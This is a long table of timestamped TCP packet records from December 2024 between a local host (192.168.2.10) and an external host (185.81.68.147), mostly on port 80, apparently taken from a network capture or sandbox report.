                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.684601068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.686387062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.686435938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.686490059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.688307047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.688409090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.688904047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.690342903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.690481901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.690530062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.692234039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.692270994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.692388058 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.694067955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.694164991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.694216013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.695950985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.696062088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.696162939 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.697787046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.697940111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.698738098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.699620962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.699707031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.699773073 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.701522112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.701589108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.701704979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.703126907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.703234911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.703274012 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.704998016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.705009937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.705122948 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.706768990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.706878901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.706927061 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.708420992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.708551884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.708887100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.710093021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.710201025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.711787939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.711849928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.711971998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.712901115 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.713500977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.713711023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.713754892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.715131998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.715260983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.715303898 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.716731071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.716835022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.718373060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.718417883 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.718453884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.718492031 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.719976902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.720218897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.720334053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.721582890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.721668005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.721715927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.723200083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.723277092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.723459959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.724811077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.724894047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.725016117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.726381063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.726479053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.727577925 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.727958918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.728120089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.728905916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.729537010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.729625940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.731098890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.731143951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.731169939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.731736898 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.732614994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.732742071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.732887983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.734195948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.734266996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.734317064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.735692978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.735809088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.735855103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.737205029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.737293005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.737344027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.738172054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.738295078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.738338947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.739006042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.739131927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.739849091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.739912987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.739942074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.739999056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.740783930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.740869999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.741736889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.741835117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.741837025 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.742571115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.742620945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.742655993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.742717981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.743463993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.743619919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.743839979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.744322062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.744474888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.744900942 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.745203018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.745299101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.745409966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.746092081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.746170044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.746262074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.747018099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.747168064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.747258902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.747890949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.748045921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.748147011 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.748857975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.748922110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.749061108 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.749664068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.749923944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.749974012 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.750595093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.750675917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.750720978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.751432896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.751626968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.751671076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.752326965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.752459049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.752837896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.753246069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.753400087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.754067898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.754108906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.830642939 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.871525049 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.871557951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.871613979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.871726990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.871905088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.872001886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.872035027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.872798920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.872888088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.872986078 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.873765945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.873900890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.873995066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.874573946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.874703884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.874795914 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.875905037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.876115084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.876213074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.876761913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.876871109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.876964092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.877357006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.877420902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.877511024 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.878106117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.878226042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.878318071 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.878993034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.879093885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.879195929 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.879853964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.879966974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.880060911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.880724907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.880822897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.880944014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.881648064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.881733894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.881825924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.882497072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.882600069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.882689953 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.883408070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.883538008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.883631945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.884237051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.884346962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.884439945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.885238886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.885339975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.885433912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.886064053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.886125088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.886215925 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.886867046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.886995077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.887084007 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.887759924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.887849092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.887937069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.888636112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.888725996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.888766050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.889508009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.889621019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.889668941 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.890440941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.890532017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.890578985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.891381979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.891534090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.891628027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.892141104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.892246962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.892345905 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.892993927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.893062115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.893153906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.893942118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.894006968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.894098043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.894870996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.895034075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.895121098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.895762920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.895879030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.895978928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.896533966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.896624088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.896732092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.897442102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.897528887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.897618055 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.898293972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.898487091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.898753881 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.899161100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.899183989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.899274111 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.900110006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.900192022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.900295019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.900899887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.900984049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.901084900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.901806116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.901894093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.901983023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.902673006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.902745962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.902833939 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.903531075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.903656960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.903697968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.904421091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.904551029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.904594898 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.905370951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.905441999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.905478954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.906163931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.906290054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.906331062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.907044888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.907180071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.907222986 CET4972380192.168.2.10185.81.68.147
